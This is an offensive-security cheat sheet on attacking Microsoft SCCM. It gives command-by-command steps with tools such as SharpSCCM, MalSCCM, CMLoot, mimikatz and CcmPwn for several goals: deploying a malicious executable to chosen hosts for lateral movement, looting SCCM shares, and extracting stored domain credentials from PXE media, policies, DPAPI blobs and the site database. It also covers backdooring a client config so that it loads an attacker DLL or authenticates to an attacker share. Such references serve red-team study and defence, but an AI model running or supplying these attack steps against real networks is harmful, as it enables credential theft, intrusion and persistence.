# Deployment - SCCM > SCCM is a solution from Microsoft to enhance administration in a scalable way across an organisation. ## SCCM Application Deployment > Application Deployment is a process that involves packaging software applications and distributing them to selected computers or devices within an organization **Tools**: * [PowerShellMafia/PowerSCCM - PowerShell module to interact with SCCM deployments](https://github.com/PowerShellMafia/PowerSCCM) * [nettitude/MalSCCM - Abuse local or remote SCCM servers to deploy malicious applications to hosts they manage](https://github.com/nettitude/MalSCCM) **Exploitation**: * Using **SharpSCCM** ```ps1 .\SharpSCCM.exe get devices --server --site-code .\SharpSCCM.exe exec -d -r .\SharpSCCM.exe exec -d WS01 -p "C:\Windows\System32\ping 10.10.10.10" -s --debug ``` * Compromise client, use locate to find management server ```ps1 MalSCCM.exe locate ``` * Enumerate over WMI as an administrator of the Distribution Point ```ps1 MalSCCM.exe inspect /server: /groups ``` * Compromise management server, use locate to find primary server * Use `inspect` on primary server to view who you can target ```ps1 MalSCCM.exe inspect /all MalSCCM.exe inspect /computers MalSCCM.exe inspect /primaryusers MalSCCM.exe inspect /groups ``` * Create a new device group for the machines you want to laterally move too ```ps1 MalSCCM.exe group /create /groupname:TargetGroup /grouptype:device MalSCCM.exe inspect /groups ``` * Add your targets into the new group ```ps1 MalSCCM.exe group /addhost /groupname:TargetGroup /host:WIN2016-SQL ``` * Create an application pointing to a malicious EXE on a world readable share : `SCCMContentLib$` ```ps1 MalSCCM.exe app /create /name:demoapp /uncpath:"\\BLORE-SCCM\SCCMContentLib$\localthread.exe" MalSCCM.exe inspect /applications ``` * Deploy the application to the target group ```ps1 MalSCCM.exe app /deploy /name:demoapp /groupname:TargetGroup /assignmentname:demodeployment MalSCCM.exe inspect /deployments ``` * Force the target group to checkin for updates ```ps1 MalSCCM.exe checkin /groupname:TargetGroup ``` * Cleanup the application, deployment and group ```ps1 MalSCCM.exe app /cleanup /name:demoapp MalSCCM.exe group /delete /groupname:TargetGroup ``` ## SCCM Shares > Find interesting files stored on (System Center) Configuration Manager (SCCM/CM) SMB shares * [1njected/CMLoot](https://github.com/1njected/CMLoot) ```ps1 Invoke-CMLootInventory -SCCMHost sccm01.domain.local -Outfile sccmfiles.txt Invoke-CMLootDownload -SingleFile \\sccm\SCCMContentLib$\DataLib\SC100001.1\x86\MigApp.xml Invoke-CMLootDownload -InventoryFile .\sccmfiles.txt -Extension msi ``` ## SCCM Configuration Manager * [subat0mik/Misconfiguration-Manager/MisconfigurationManager.ps1](https://raw.githubusercontent.com/subat0mik/Misconfiguration-Manager/main/MisconfigurationManager.ps1) ### CRED-1 Retrieve credentials via PXE boot media * [Misconfiguration-Manager - CRED-1](https://github.com/subat0mik/Misconfiguration-Manager/blob/main/attack-techniques/CRED/CRED-1/cred-1_description.md) **Requirements**: * On the SCCM Distribution Point: `HKLM\Software\Microsoft\SMS\DP\PxeInstalled` = 1 * On the SCCM Distribution Point: `HKLM\Software\Microsoft\SMS\DP\IsPxe` = 1 * PXE-enabled distribution point **Exploitation**: * [csandker/pxethiefy](https://github.com/csandker/pxethiefy) ```ps1 sudo python3 pxethiefy.py explore -i eth0 ``` * [MWR-CyberSec/PXEThief](https://github.com/MWR-CyberSec/PXEThief) ### CRED-2 Request a policy containing credentials * [Misconfiguration-Manager - CRED-2](https://github.com/subat0mik/Misconfiguration-Manager/blob/main/attack-techniques/CRED/CRED-2/cred-2_description.md) **Requirements**: * PKI certificates are not required for client authentication * Domain accounts credential **Exploitation**: Create a machine or compromise an existing one, then request policies such as `NAAConfig` ```ps1 SharpSCCM get secrets -u -p SharpSCCM get naa ``` ### CRED-3 Extract currently deployed credentials stored as DPAPI blobs > Dump currently deployed secrets via WMI. If you can escalate on a host that is an SCCM client, you can retrieve plaintext domain credentials. * [Misconfiguration-Manager - CRED-3](https://github.com/subat0mik/Misconfiguration-Manager/blob/main/attack-techniques/CRED/CRED-3/cred-3_description.md) **Requirements**: * Local administrator privileges on an SCCM client **Exploitation**: * Find SCCM blob ```ps1 Get-Wmiobject -namespace "root\ccm\policy\Machine\ActualConfig" -class "CCM_NetworkAccessAccount" NetworkAccessPassword : NetworkAccessUsername : ``` * Using [GhostPack/SharpDPAPI](https://github.com/GhostPack/SharpDPAPI/blob/81e1fcdd44e04cf84ca0085cf5db2be4f7421903/SharpDPAPI/Commands/SCCM.cs#L208-L244) ```ps1 $str = "060...F2DAF" $bytes = for($i=0; $i -lt $str.Length; $i++) {[byte]::Parse($str.Substring($i, 2), [System.Globalization.NumberStyles]::HexNumber); $i++} $b64 = [Convert]::ToBase64String($bytes[4..$bytes.Length]) .\SharpDPAPI.exe blob /target:$b64 /mkfile:masterkeys.txt ``` * Using [Mayyhem/SharpSCCM](https://github.com/Mayyhem/SharpSCCM) for SCCM retrieval and decryption ```ps1 .\SharpSCCM.exe local secrets -m wmi ``` From a remote machine. * Using [garrettfoster13/sccmhunter](https://github.com/garrettfoster13/sccmhunter) ```ps1 python3 ./sccmhunter.py http -u "administrator" -p "P@ssw0rd" -d internal.lab -dc-ip 10.10.10.10. -auto ``` ### CRED-4 Extract legacy credentials stored as DPAPI blobs * [Misconfiguration-Manager - CRED-4](https://github.com/subat0mik/Misconfiguration-Manager/blob/main/attack-techniques/CRED/CRED-4/cred-4_description.md) **Requirements**: * Local administrator privileges on an SCCM client **Exploitation**: * Search the database using `SharpDPAPI` ```ps1 .\SharpDPAPI.exe search /type:file /path:C:\Windows\System32\wbem\Repository\OBJECTS.DATA ``` * Search the database using `SharpSCCM` ```ps1 .\SharpSCCM.exe local secrets -m disk ``` * Check ACL for the CIM repository located at `C:\Windows\System32\wbem\Repository\OBJECTS.DATA`: ```ps1 Get-Acl C:\Windows\System32\wbem\Repository\OBJECTS.DATA | Format-List -Property PSPath,sddl ConvertFrom-SddlString "" ``` ### CRED-5 Extract the SC_UserAccount table from the site database * [Misconfiguration-Manager - CRED-5](https://github.com/subat0mik/Misconfiguration-Manager/blob/main/attack-techniques/CRED/CRED-5/cred-5_description.md) **Requirements**: * Site database access * Primary site server access * Access to the private key used for encryption **Exploitation**: * [gentilkiwi/mimikatz](https://twitter.com/gentilkiwi/status/1392204021461569537) ```ps1 mimikatz # misc::sccm /connectionstring:"DRIVER={SQL Server};Trusted=true;DATABASE=ConfigMgr_CHQ;SERVER=CM1;" ``` * [skahwah/SQLRecon](https://github.com/skahwah/SQLRecon), only if the site server and database are hosted on the same system ```ps1 SQLRecon.exe /auth:WinToken /host:CM1 /database:ConfigMgr_CHQ /module:sDecryptCredentials ``` * SQLRecon + [xpn/sccmdecryptpoc.cs](https://gist.github.com/xpn/5f497d2725a041922c427c3aaa3b37d1) ```ps1 SQLRecon.exe /auth:WinToken /host: /database:CM_ /module:query /command:"SELECT * FROM SC_UserAccount" sccmdecryptpoc.exe 0C010000080[...]5D6F0 ``` ## SCCM Persistence * [mandiant/CcmPwn](https://github.com/mandiant/CcmPwn) - lateral movement script that leverages the CcmExec service to remotely hijack user sessions. CcmExec is a service native to SCCM Windows clients that is executed on every interactive session. This technique requires Adminsitrator privileges on the targeted machine. * Backdoor the `SCNotification.exe.config` to load your DLL ```ps1 python3 ccmpwn.py domain/user:password@workstation.domain.local exec -dll evil.dll -config exploit.config ``` * Malicious config to force `SCNotification.exe` to load a file from an attacker-controlled file share ```ps1 python3 ccmpwn.py domain/user:password@workstation.domain.local coerce -computer 10.10.10.10 ``` ## References * [Network Access Accounts are evil… - ROGER ZANDER - 13 SEP 2015](https://rzander.azurewebsites.net/network-access-accounts-are-evil/) * [The Phantom Credentials of SCCM: Why the NAA Won’t Die - Duane Michael - Jun 28](https://posts.specterops.io/the-phantom-credentials-of-sccm-why-the-naa-wont-die-332ac7aa1ab9) * [Introducing MalSCCM - Phil Keeble -May 4, 2022](https://labs.nettitude.com/blog/introducing-malsccm/) * [Exploiting RBCD Using a Normal User Account - tiraniddo.dev - Friday, 13 May 2022](https://www.tiraniddo.dev/2022/05/exploiting-rbcd-using-normal-user.html) * [Exploring SCCM by Unobfuscating Network Access Accounts - @_xpn_ - Posted on 2022-07-09](https://blog.xpnsec.com/unobfuscating-network-access-accounts/) * [Relaying NTLM Authentication from SCCM Clients - Chris Thompson - Jun 30, 2022](https://posts.specterops.io/relaying-ntlm-authentication-from-sccm-clients-7dccb8f92867) * [Misconfiguration Manager: Overlooked and Overprivileged - Duane Michael - Mar 5, 2024](https://posts.specterops.io/misconfiguration-manager-overlooked-and-overprivileged-70983b8f350d) * [SeeSeeYouExec: Windows Session Hijacking via CcmExec - Andrew Oliveau](https://cloud.google.com/blog/topics/threat-intelligence/windows-session-hijacking-via-ccmexec?hl=en) * [SCCM / MECM LAB - Part 0x0 - mayfly - Mar 23, 2024](https://mayfly277.github.io/posts/SCCM-LAB-part0x0/) * [SCCM / MECM LAB - Part 0x1 - Recon and PXE - mayfly - Mar 28, 2024](https://mayfly277.github.io/posts/SCCM-LAB-part0x1/) * [SCCM / MECM LAB - Part 0x2 - Low user - mayfly - Mar 28, 2024](https://mayfly277.github.io/posts/SCCM-LAB-part0x2/) * [SCCM / MECM LAB - Part 0x3 - Admin User - mayfly - Apr 3, 2024](https://mayfly277.github.io/posts/SCCM-LAB-part0x3/)